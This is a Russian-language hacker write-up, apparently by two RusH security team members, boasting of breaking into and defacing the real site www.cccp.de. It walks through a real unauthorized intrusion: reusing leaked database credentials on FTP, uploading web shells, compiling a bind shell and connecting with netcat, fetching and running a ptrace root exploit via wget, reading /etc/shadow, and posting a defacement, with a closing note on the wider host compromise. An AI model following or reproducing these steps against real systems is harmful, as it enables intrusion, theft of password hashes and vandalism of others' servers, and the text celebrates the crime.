Как был взломан www.cccp.de


     Лирическое отступление...
     -------------------------
     Одним  ранним  утром,  нет  одним  прекраснейшим ранним утром я сидел и бездельничал. Делать было нечего, и
     решил  помучить  Yandex  набрал  в  поисковике  RusH  security  team  и начал изучать сайты и их содержимое
     поочерёдно (что мол о нас пишут) и тут я натыкаюсь на сайт http://www.cccp.de, интересненько, что мы делаем
     на  данном  сайте  ?  =)  Зашёл,  посмотрел, сайт в Германии но на русском языке мол для эмигрантов немного
     посмотрев сайт, не найдя для себя чего-нибудь интересного решил проверить так сказать на вшивость.
     

     Let's go...
     -----------
     CGI-scanner показал немного за исключением одного момента:

     http://www.cccp.de/config.inc 200 - [Found]

     Опа, важная информация, но в последствии я очень удивился, когда открыв ссылку увидел следующее

     <?
     $server = "81.201.96.5";
     $user = "vps01100";
     $passwd = "*******";
     ?>

     // пароль я скрыл, по понятным причинам...

     Это  были  логин  и  пароль  для  подключения к БД. На серваке стоял скуль, но подключившись в нему с этими
     данными я обломался так как нифига интересного там не было =(
     Недолго думая я пошёл на фтп... ftp://www.cccp.de ввёл логин пасс =) подошло =)

     На  фтп  был  каталог  /boerse = boerse.cccp.de и сам сайт cccp.de в папке www/cccp/. Так как первый нам не
     нужен я решил дефасить второй. Состряпал дефейс зашёл на фтп через http://web2ftp.com
     пытаюсь переименовать index.php в index_hacked.php, и опа нехватает прав...
     Пытаюсь поменять атрибуты не получается =( Попробовал с другими файлами такая же история.
     Иду в директорию /boerse/ всё меняется всё получается, но наша цель выше... Заливаю в директорию
     подсайта  скриптик  remview.php  (просмотр  директорий и файлов) долго лазил в скриптах и поисках различной
     инфы  нашёл  несколько  паролей  но  всё было не к тому чему надо, уже совсем опустил руки, но тут появился
     1dt.w0lf я в кратце всё ему объяснил начали думать вместе.

     
     Далее от лица 1dt.w0lf'a:
     -------------------------
     Захожу  я значится  в irc  дабы с утреца (а время было около 10 утра =) для меня неимоверная рань ) немного
     поболтать  и  расслабится...  и  тут на канал врывается Грасп и орет что мол нашел сервак, надо посмотреть,
     багов куча и т.п. В общем день начался весело... =) Ну делать нечего, залез на фтп, залил phpshell.php (мне
     нравится  больше  remview  т.к.  нет графики, одна командная строка... а больше нифига и не надо для нашего
     дела)  Оглянулся, принюхался... Для начала решил узнать что у нас за система. Команда "uname -a" выдала что
     мы  имеем  дело  с  линухом.  Гы-гы-гы  линухи люблю =) Решил попробовать рутится через багу в ptrace благо
     сплоит под рукой был, может не все админы слышали о этой баге? ;) Но сплоит через http-шелл не запустишь, а
     к ssh логин и пароль для фтп не подходили =( Ну это дело поправимое =) Залил на фтп маленькую прогу которая
     открывала  порт  и биндила его к /bin/bash, через phpshell.php скомпилил, благо компилятор на серваке был и
     запустил.  Потом  с  шелла  (c  другого)  запустил  netcat: nc 81.201.96.5 50666 ( где 50666 - порт который
     открыла  прога  )  и  получил  шелл на серваке. Осталось дело за малым ... порутится =) Заливаю сплоит wget
     http://www.site.com/ptrace.c  компилю  gcc -o ptrace ptrace.c и запускаю ./ptrace =) Ну что говорить? Админ
     про такую багу видимо не знал =) id выдает uid=0 gid=0 и я в нирване =)))

     
     Gr4sp3r:
     --------
     Хех  ну  дальше  всё было делом техники cat /etc/shadow. Получили пароли, расшифровывать ломало да и пароли
     там  были  достаточно  сложные.  Поэтому мы пошли более легким путем, используя привилегии суперюзера Вульф
     поменял атрибуты папки =)
     Я побыстрому залил дефейс и добавил его на воид.ру =)
     http://taxidermia.void.ru/mirrors/2003/05/23/www.cccp.de

     P.S.
     Сайт www.cccp.de хостится на немецком хостинге www.vpserver.de на котором находится около 200 сайтов, это я
     к тому что из-за ошибки админов сайта www.cccp.de мы получили полный доступ к серверу хостера.

     З.Ы.ключительное слово от 1dt.w0lf'a
     Продолжение  этой  истории  было  не  менее  занимательно чем сам взлом. Грасп на дефе написал что-то типа:
     "Немцы  идите  в  жопу  ...  и  т.д."  и  буквально  через пару минут после дефа на нашем форуме появляется
     сообщение  с обвинением нас в нацизме =) Опачки %0 Я скидываю инфу граспу... он недолго думая рисует второй
     деф  с надписью типа "Немцы извините..." и меняет индекс снова. Отдаю должное уважение админу сайта, второй
     деф  провисел  не  более  одной  минуты, Грасп даже зеркало сделать не успел... обидно. Я пишу админу сайта
     письмо  с  описанием  его  ошибки  на  сайте  и  маленький  модуль для исправления баги ptrace для хостера.
     По-видимому  админы хостинга злые люди, т.к. буквально на следующий день они снесли сайт cccp.de под цоколь
     =( Из всего количества сайтов на хостинге задефейсен был только один cccp.de остальные остались нетронутыми
     т.к.  масс-дефейс  не  был  нашей  целью.  Вот такое получилось утречко. Удачи вам... ешьте кашку по утрам,
     проставляйте  правильно  атрибуты  на  файлы  с  важной  инфой,  не используйте одинаковых паролей к разным
     сервисам и следите за багтраком... cya...



     Авторы: Gr4sp3r & 1dt.w0lf
     ---------------------------------------
     RusH security team - http://rst.void.ru